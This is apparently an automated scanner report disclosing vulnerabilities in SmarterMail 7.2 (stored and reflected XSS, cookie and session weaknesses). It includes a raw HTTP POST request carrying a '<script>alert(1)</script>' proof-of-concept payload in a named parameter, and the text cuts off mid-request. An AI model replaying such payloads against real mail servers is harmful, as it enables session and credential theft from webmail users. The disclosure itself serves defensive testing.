SmarterMail 7.2, XSS, Stored XSS, SQL Injection, LDAP Injection, Default Configuration, SmarterTools WebServer


Use IIS7 or IIS7.5 in production as a workaround

Target = SmarterMail 7.x (7.2.3925)
Report generated by XSS.CX Research Blog at Mon Oct 04 15:30:31 EDT 2010.


Contents

1. Cross-site scripting (stored)

2. Cross-site scripting (reflected)

2.1. http://vulnerable.smartermail.site:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]

2.2. http://vulnerable.smartermail.site:9998/Main/frmStoredFiles.aspx [path parameter]

3. Cleartext submission of password

4. Session token in URL

5. Cross-domain Referer leakage

5.1. http://vulnerable.smartermail.site:9998/Reports/frmReport.aspx

5.2. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmHelp.aspx

6. Cookie without HttpOnly flag set

6.1. http://vulnerable.smartermail.site:9998/Default.aspx

6.2. http://vulnerable.smartermail.site:9998/Main/frmCalendar.aspx

6.3. http://vulnerable.smartermail.site:9998/Main/frmMessage.aspx

6.4. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

6.5. http://vulnerable.smartermail.site:9998/frmError.aspx

7. Email addresses disclosed

7.1. http://vulnerable.smartermail.site:9998/Default.aspx

7.2. http://vulnerable.smartermail.site:9998/Main/Alerts/frmAlert.aspx

7.3. http://vulnerable.smartermail.site:9998/Main/Calendar/frmEvent.aspx

7.4. http://vulnerable.smartermail.site:9998/Main/frmAutocomplete.aspx

7.5. http://vulnerable.smartermail.site:9998/Main/frmMyInfo.aspx

7.6. http://vulnerable.smartermail.site:9998/Main/frmMySettings.aspx

7.7. http://vulnerable.smartermail.site:9998/Main/frmMySettings.aspx

7.8. http://vulnerable.smartermail.site:9998/Main/frmSignatures.aspx

7.9. http://vulnerable.smartermail.site:9998/Reports/frmReport.aspx

8. HTML does not specify charset

9. Content type incorrectly stated

9.1. http://vulnerable.smartermail.site:9998/Default.aspx

9.2. http://vulnerable.smartermail.site:9998/FileStorageUpload.ashx

9.3. http://vulnerable.smartermail.site:9998/Main/Calendar/frmEvent.aspx

9.4. http://vulnerable.smartermail.site:9998/Main/frmCalendar.aspx

9.5. http://vulnerable.smartermail.site:9998/Main/frmMySettings.aspx

9.6. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

10. Content type is not specified

10.1. http://vulnerable.smartermail.site:9998/FileStorageUpload.ashx

10.2. http://vulnerable.smartermail.site:9998/Main/Alerts/frmAlert.aspx

10.3. http://vulnerable.smartermail.site:9998/Main/Calendar/frmEvent.aspx

10.4. http://vulnerable.smartermail.site:9998/Main/frmCalendar.aspx

10.5. http://vulnerable.smartermail.site:9998/Main/frmContentFilters.aspx

10.6. http://vulnerable.smartermail.site:9998/Main/frmNote.aspx

10.7. http://vulnerable.smartermail.site:9998/Main/frmTask.aspx

10.8. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmAddFileStorageFolder.aspx



1. Cross-site scripting (stored)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/Alerts/frmAlerts.aspx

Issue detail

The value of the ctl00%24MPH%24txtHookName_SettingText request parameter submitted to the URL /Main/Alerts/frmAlert.aspx is copied into the HTML document as plain text between tags at the URL /Main/Alerts/frmAlerts.aspx. The payload 3bf4b<script>alert(1)</script>db961c96c95 was submitted in the ctl00%24MPH%24txtHookName_SettingText parameter. This input was returned unmodified in a subsequent request for the URL /Main/Alerts/frmAlerts.aspx.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

POST /Main/Alerts/frmAlert.aspx?level=user HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Main/Alerts/frmAlert.aspx?level=user
Cache-Control: max-age=0
Origin: http://vulnerable.smartermail.site:9998
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserEvents"}; STTTState=
Content-Length: 13976

__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTg4Nzk4ODg3MA8WBh4IX19fVGl0bGUFBkV2ZW50cx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCgIDD2QWAgIDD2QWAgIBDw8WAh4LTmF2aWdhdGVVUkwFGWZybUFsZXJ0cy5hc3B4P2xldmVsPXVzZXJkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIJD2QWAgIBD2QWAgICD2QWAgIBD2QWAmYPZBYEAgEPZBYGAgEPZBYCAgEPZBYCZg8QZBAVARNEZWZhdWx0IEV2ZW50IEdyb3VwFQESQERlZmF1bHRFdmVudEdyb3VwFCsDAWdkZAICD2QWAgIBD2QWAmYPEA8WAh4MQXV0b1Bvc3RCYWNrZ2QQFQMNQ29sbGFib3JhdGlvbgVFbWFpbARVc2VyFQMOQENvbGxhYm9yYXRpb24GQEVtYWlsBUBVc2VyFCsDA2dnZxYBZmQCAw9kFgICAQ9kFgJmDxAPFgIfB2dkEBUCGUNhbGVuZGFyIFJlbWluZGVyIE9jY3VyZWQVVGFzayBSZW1pbmRlciBPY2N1cmVkFQIQQ2FsZW5kYXJSZW1pbmRlcgxUYXNrUmVtaW5kZXIUKwMCZ2cWAWZkAgUPZBYCZg9kFgICAQ9kFgYCAQ8QZBAVAgdCZXR3ZWVuB091dHNpZGUVAgdCZXR3ZWVuB091dHNpZGUUKwMCZ2dkZAIDDw8WEB4HTWluRGF0ZQYAQFcgUwVRCB4MU2VsZWN0ZWREYXRlBgAw0jxRMM2IHgdNYXhEYXRlBgAA25l6PzEJHhxFbmFibGVFbWJlZGRlZEJhc2VTdHlsZXNoZWV0aB4TRW5hYmxlRW1iZWRkZWRTa2luc2geBFNraW4FDFNtYXJ0ZXJUb29scx4IQ3NzQ2xhc3MFElRpbWVQaWNrZXJPdmVycmlkZR4EXyFTQgICZBYKZg8UKwAIDxYWHg1PcmlnaW5hbFZhbHVlBQc5OjAwIEFNHwxoHw0FDFNtYXJ0ZXJUb29scx8KBgAA25l6PzEJHgpEYXRlRm9ybWF0BQF0HhFEaXNwbGF5RGF0ZUZvcm1hdAUBdB8GBRMyMDEwLTEwLTAyLTA5LTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfC2gfCAYAQFcgUwVRCGQWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHw4FEXJpVGV4dEJveCByaUhvdmVyHw8CggIWBh8VGwAAAAAAAFlABwAAAB8OBRFyaVRleHRCb3ggcmlFcnJvch8PAoICFgYfFRsAAAAAAABZQAcAAAAfDgUTcmlUZXh0Qm94IHJpRm9jdXNlZB8PAoICFgYfFRsAAAAAAABZQAcAAAAfDgUTcmlUZXh0Qm94IHJpRW5hYmxlZB8PAoICFgYfFRsAAAAAAABZQAcAAAAfDgUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDwKCAhYGHxUbAAAAAAAAWUAHAAAAHw4FEXJpVGV4dEJveCByaUVtcHR5Hw8CggIWBh8VGwAAAAAAAFlABwAAAB8OBRByaVRleHRCb3ggcmlSZWFkHw8CggJkAgEPDxYCHwVoZGQCAg88KwANAQAPFggFD1JlbmRlckludmlzaWJsZWcFBE1pbkQGAEBXIFMFUQgFEUVuYWJsZU11bHRpU2VsZWN0aAUETWF4RAYAANuZej8xCQ8WCB8LaB8MaB8NBQxTbWFydGVyVG9vbHMfBWhkZAIDDw8WBB4ISW1hZ2VVcmwFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh4NSG92ZXJJbWFnZVVybAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIeB29uY2xpY2sFRHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfY29uZGl0aW9uX3RpbWVvZmRheScpLCd0aW1lJyk7ZAIEDxQrAAIPFg4fC2gfDGgeCVN0YXJ0VGltZSgpXFN5c3RlbS5UaW1lU3BhbiwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CDA3OjAwOjAwHgdFbmRUaW1lKCsECDE5OjAwOjAwHghJbnRlcnZhbCgrBAgwMDoxNTowMB8NBQxTbWFydGVyVG9vbHMfFGhkFgQfDgUHcmNIb3Zlch8PAgIWAmYPFCsACQ8WBh4NUmVwZWF0Q29sdW1ucwIEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIwZBYEHw5lHw8CAmQWBB8OZR8PAgJkZBYEHw4FCHJjSGVhZGVyHw8CAhYEHw4FCHJjRm9vdGVyHw8CAhYGHxUbAAAAAABAb0ABAAAAHw4FNFJhZENhbGVuZGFyVGltZVZpZXcgUmFkQ2FsZW5kYXJUaW1lVmlld19TbWFydGVyVG9vbHMfDwKCAhZgAgEPZBYCZg8WAh4JaW5uZXJodG1sBQc3OjAwIEFNZAICD2QWAmYPFgIfHwUHNzoxNSBBTWQCAw9kFgJmDxYCHx8FBzc6MzAgQU1kAgQPZBYCZg8WAh8fBQc3OjQ1IEFNZAIFD2QWAmYPFgIfHwUHODowMCBBTWQCBg9kFgJmDxYCHx8FBzg6MTUgQU1kAgcPZBYCZg8WAh8fBQc4OjMwIEFNZAIID2QWAmYPFgIfHwUHODo0NSBBTWQCCQ9kFgJmDxYCHx8FBzk6MDAgQU1kAgoPZBYCZg8WAh8fBQc5OjE1IEFNZAILD2QWAmYPFgIfHwUHOTozMCBBTWQCDA9kFgJmDxYCHx8FBzk6NDUgQU1kAg0PZBYCZg8WAh8fBQgxMDowMCBBTWQCDg9kFgJmDxYCHx8FCDEwOjE1IEFNZAIPD2QWAmYPFgIfHwUIMTA6MzAgQU1kAhAPZBYCZg8WAh8fBQgxMDo0NSBBTWQCEQ9kFgJmDxYCHx8FCDExOjAwIEFNZAISD2QWAmYPFgIfHwUIMTE6MTUgQU1kAhMPZBYCZg8WAh8fBQgxMTozMCBBTWQCFA9kFgJmDxYCHx8FCDExOjQ1IEFNZAIVD2QWAmYPFgIfHwUIMTI6MDAgUE1kAhYPZBYCZg8WAh8fBQgxMjoxNSBQTWQCFw9kFgJmDxYCHx8FCDEyOjMwIFBNZAIYD2QWAmYPFgIfHwUIMTI6NDUgUE1kAhkPZBYCZg8WAh8fBQcxOjAwIFBNZAIaD2QWAmYPFgIfHwUHMToxNSBQTWQCGw9kFgJmDxYCHx8FBzE6MzAgUE1kAhwPZBYCZg8WAh8fBQcxOjQ1IFBNZAIdD2QWAmYPFgIfHwUHMjowMCBQTWQCHg9kFgJmDxYCHx8FBzI6MTUgUE1kAh8PZBYCZg8WAh8fBQcyOjMwIFBNZAIgD2QWAmYPFgIfHwUHMjo0NSBQTWQCIQ9kFgJmDxYCHx8FBzM6MDAgUE1kAiIPZBYCZg8WAh8fBQczOjE1IFBNZAIjD2QWAmYPFgIfHwUHMzozMCBQTWQCJA9kFgJmDxYCHx8FBzM6NDUgUE1kAiUPZBYCZg8WAh8fBQc0OjAwIFBNZAImD2QWAmYPFgIfHwUHNDoxNSBQTWQCJw9kFgJmDxYCHx8FBzQ6MzAgUE1kAigPZBYCZg8WAh8fBQc0OjQ1IFBNZAIpD2QWAmYPFgIfHwUHNTowMCBQTWQCKg9kFgJmDxYCHx8FBzU6MTUgUE1kAisPZBYCZg8WAh8fBQc1OjMwIFBNZAIsD2QWAmYPFgIfHwUHNTo0NSBQTWQCLQ9kFgJmDxYCHx8FBzY6MDAgUE1kAi4PZBYCZg8WAh8fBQc2OjE1IFBNZAIvD2QWAmYPFgIfHwUHNjozMCBQTWQCMA9kFgJmDxYCHx8FBzY6NDUgUE1kAgcPDxYQHwgGAEBXIFMFUQgfCQYAcPVKlDDNiB8KBgAA25l6PzEJHwtoHwxoHw0FDFNtYXJ0ZXJUb29scx8OBRJUaW1lUGlja2VyT3ZlcnJpZGUfDwICZBYKZg8UKwAIDxYWHxAFBzU6MDAgUE0fDGgfDQUMU21hcnRlclRvb2xzHwoGAADbmXo%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%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQEFjdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApBY3Rpb25zVGFiC2QFF2N0bDAwJFRQSCRUYWJTdHJpcCRUYWIxDzLWCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2S2MA9R0J3f0ba%2FCrtX2z6tsY%2BzCQ%3D%3D&ctl00%24TPH%24TabStrip%24SelectedTab=ctl00_TPH_TabStrip_Tab1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtHookName_SettingText=3bf4b<script>alert(1)</script>db961c96c95&ctl00%24MPH%24ddEventGroup_SettingDropDown=%40DefaultEventGroup&ctl00%24MPH%24ddEventCategory_SettingDropDown=%40Collaboration&ctl00%24MPH%24ddEventType_SettingDropDown=CalendarReminder&ctl00%24MPH%24enabled_timeofday=on&ctl00%24MPH%24conditiontype_timeofday=Between&ctl00%24MPH%24condition_timeofday=2010-10-02-09-00-00&ctl00_MPH_condition_timeofday_dateInput_text=9%3A00+AM&ctl00%24MPH%24condition_timeofday%24dateInput=2010-10-02-09-00-00&ctl00_MPH_condition_timeofday_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1900+0%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2100+